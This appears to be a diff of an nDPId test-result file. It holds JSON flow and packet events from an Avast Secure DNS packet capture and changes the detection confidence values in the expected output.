00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1625482396320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482396320,"pkt":"YDjgxTWgeJS0JASgCABFAADMN0IAADMRs2e11iOVwKgCZAG7+SAAuJzBl06BgAABAAEAAAAAATIJc0VDdVJlZG5TBUFWQVN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1625482399044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482399044,"pkt":"eJS0JASgYDjgxTWgCABFAABD9g4AAH8RqSPAqAJktdYjlcNYAbsAL0Y+i0sBAAABAAAAAAAAATIJU0VjVVJFRG5TBUF2QXN0A0NvbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482399044,"flow_last_seen":1625482399044,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482399044,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1625482399165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482399165,"pkt":"YDjgxTWgeJS0JASgCABFAADMOy8AADIRsHq11iOVwKgCZAG7w1gAuL6si0uBgAABAAEAAAAAATIJU0VjVVJFRG5TBUF2QXN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1625482401089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482401089,"pkt":"eJS0JASgYDjgxTWgCABFAABD9hIAAH8RqR\/AqAJktdYjlcJJAbsAL3PfnlkBAAABAAAAAAAAATIJc0VjVVJFZE5zBUFWYXNUA2NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482401089,"flow_last_seen":1625482401089,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482401089,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1625482401211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482401211,"pkt":"YDjgxTWgeJS0JASgCABFAADMPeEAADIRrci11iOVwKgCZAG7wkkAuOxNnlmBgAABAAEAAAAAATIJc0VjVVJFZE5zBUFWYXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1625482484544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482484544,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/EEAAH8RovDAqAJktdYjlcqvAbsAL8hTAb8BAAABAAAAAAAAATIJU0VDVXJlRG5zBUFWYXN0A0NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484544,"flow_last_seen":1625482484544,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1625482484661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482484661,"pkt":"YDjgxTWgeJS0JASgCABFAADMsJIAADIROxe11iOVwKgCZAG7yq8AuEDCAb+BgAABAAEAAAAAATIJU0VDVXJlRG5zBUFWYXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1625482484661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482484661,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/D0AAH8RovTAqAJktdYjlerfAbsAL5AIOXoBAAABAAAAAAAAATIJc0VjVXJlZE5TBUF2YXN0A2NPTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482484661,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1625482484661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482484661,"pkt":"YDjgxTWgeJS0JASgCABFAADMo38AADIRSCq11iOVwKgCZAG76t8AuAh3OXqBgAABAAEAAAAAATIJc0VjVXJlZE5TBUF2YXN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1625482486856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482486856,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/EUAAH8RouzAqAJktdYjldUSAbsAL8JN\/WEBAAABAAAAAAAAATIJc2VDVXJlZG5TBUFWQXN0A0NPTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1625482486976,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482486976,"pkt":"YDjgxTWgeJS0JASgCABFAADMt\/IAADMRMre11iOVwKgCZAG71RIAuDq8\/WGBgAABAAEAAAAAATIJc2VDVXJlZG5TBUFWQXN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":53,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":5590,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":26,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":133,"global_ts_msec":1625482998213} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1625482998213,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482998213,"pkt":"eJS0JASgYDjgxTWgCABFAABDf48AAH8RH6PAqAJktdYjlfuwAbsAL9NLpcUBAAABAAAAAAAAATIJc0VjdVJlZE5TBUF2YXNUA0NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1625482998333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482998333,"pkt":"YDjgxTWgeJS0JASgCABFAADM\/oEAADMR7Ce11iOVwKgCZAG7+7AAuEu6pcWBgAABAAEAAAAAATIJc0VjdVJlZE5TBUF2YXNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482396199,"flow_last_seen":1625482396320,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482401089,"flow_last_seen":1625482401211,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484544,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482399044,"flow_last_seen":1625482399165,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482486856,"flow_last_seen":1625482486976,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
